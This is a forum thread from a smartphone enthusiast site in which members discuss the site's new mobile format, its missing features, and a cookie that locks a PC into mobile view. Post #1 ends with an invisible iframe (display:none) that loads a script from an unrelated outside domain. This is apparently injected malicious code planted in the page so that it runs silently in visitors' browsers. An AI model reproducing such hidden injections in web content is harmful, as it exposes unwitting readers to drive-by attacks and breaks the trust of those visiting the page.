+ Reply to Thread
Results 1 to 15 of 15

Thread: Mobile Format

  1. #1
    Registered User
    Join Date
    01-06-2002
    Location
    San Diego
    Posts
    357

    Mobile Format

    The mobile format for the site is VERY nice. But, I can't figure out how to reply with a quote... How do I do this - I've needed it/ missed it many times... If it's not there, I'd really appreciate it being added.

    Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    08-27-2003
    Posts
    251
    We are continuing to develop the mobile site and we will look into adding that feature...

    We will make an official annoucement here in a few days...

    Thanks..
    -=Jimmyjoe=-

  3. #3
    Registered User
    Join Date
    01-06-2002
    Location
    San Diego
    Posts
    357
    great - thanks. Another helpful add would be a link to jump to personal prefs - i toggle between mobile/ std alot, between my ph and computer.

    BTW, I've come across the "forum jump to" combo box by accident a couple of times (in mobile format), but it's currently kind of a hit or miss to find it...


  4. #4
    Registered User
    Join Date
    01-06-2002
    Location
    San Diego
    Posts
    357
    BTW, the "go to first unread post" link on the mobile version does not appear to work the same as the normal mode - it does not appear to take you to the first new post... if you have a multi-page thread, it jumps you to the top of the page that contains the new post, but not specifically to the new post.

    Besides these things I'm finding, the mobile format is still very useful!

  5. #5
    Mod-Blog's SmartPhone Correspondent
    Join Date
    08-18-2002
    Location
    Shelton, CT USA
    Posts
    559
    Folks, Tread lightly with the mobile site for now. It is up but not yet necesarily to be considered beyond Beta stage in some ways. Recommend you hold off another few days, unless JJ wants to correct me on this.

    At the same time, it is a GREAT effort and I am working to update the PQA to take advantage of it.

  6. #6
    Registered User
    Join Date
    08-27-2003
    Posts
    251
    As far as I know there is no prolem using the mobile version on the 6035...

    If you happen to go to the mobile site from your pc and can't get back to the original site, simply LOGOUT and log back in and you will see the site normally...

    Thanks
    -=Jimmyjoe=-

  7. #7
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by jimmyjoe
    As far as I know there is no prolem using the mobile version on the 6035...

    If you happen to go to the mobile site from your pc and can't get back to the original site, simply LOGOUT and log back in and you will see the site normally...

    Thanks
    Yeah, the point of the mobile site is to use it on the 6035, not on your computer. I have used it extensively on my 6035 and have not run into any problems. But please do be patient since it's not 100% complete! But it's pretty sweet, isn't it? :drink1
    Please visit my picture site: Robert-O-Rama :)

  8. #8
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    NOw this is weird.... I can only see the mobile version here!!!!! I visited mobile.smartphonesource.com, and now www.smartphonesource.com is in a mobile version too!!! WTF?!?!

  9. #9
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    OK, fixed it. If you view the mobile version from your PC, it sets a cookie to that visual style (the mobile version is a visual style). I went into the control panel and changed the visual style to mobile, then back to default and it was fixed.

  10. #10
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by HoTSynC
    NOw this is weird.... I can only see the mobile version here!!!!! I visited mobile.smartphonesource.com, and now www.smartphonesource.com is in a mobile version too!!! WTF?!?!
    OOPS! Sounds like you need to sign out and then back in. Once your cookies are set it's going to keep sending you to the mobile version of the site. That's the way it works on my computer at home, which is fine with me at 14.4!
    Please visit my picture site: Robert-O-Rama :)

  11. #11
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by HoTSynC
    OK, fixed it. If you view the mobile version from your PC, it sets a cookie to that visual style (the mobile version is a visual style). I went into the control panel and changed the visual style to mobile, then back to default and it was fixed.
    good deal... I guess the cookies would have to be deleted to make it go back to normal on the next login.
    Please visit my picture site: Robert-O-Rama :)

  12. #12
    Oh When that Shark Bites! LBOCEAN's Avatar
    Join Date
    05-23-2002
    Location
    Long Beach, Ca
    Posts
    953
    It was suggested earlier on that for those who wanted to visit the site in both modes, to create another login (similar to your orginal) so you would'nt have to keep flipping back n' forth. (or is that thrashing, I can never remember)

    That's what i'll be doing. I really don't plan on posting via the 6035, just mostly browsing.

    But, you never know.

  13. #13
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    bah! since i have my 3G air card, i just log right in...

  14. #14
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by marctronixx
    bah! since i have my 3G air card, i just log right in...
    Yo da man Marc! And I'm da man too, cuz Vision ROCKS on the Treo 300! Ok, back to sleep now
    Please visit my picture site: Robert-O-Rama :)

  15. #15
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by LBOCEAN
    It was suggested earlier on that for those who wanted to visit the site in both modes, to create another login (similar to your orginal) so you would'nt have to keep flipping back n' forth. (or is that thrashing, I can never remember)

    That's what i'll be doing. I really don't plan on posting via the 6035, just mostly browsing.

    But, you never know.
    I actually did that a couple months ago.... but I don't like not having my "buddy list" and other stuff I've built up with my main account. And now that I'm blazing with my Treo I don't need to worry about the speed
    Please visit my picture site: Robert-O-Rama :)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts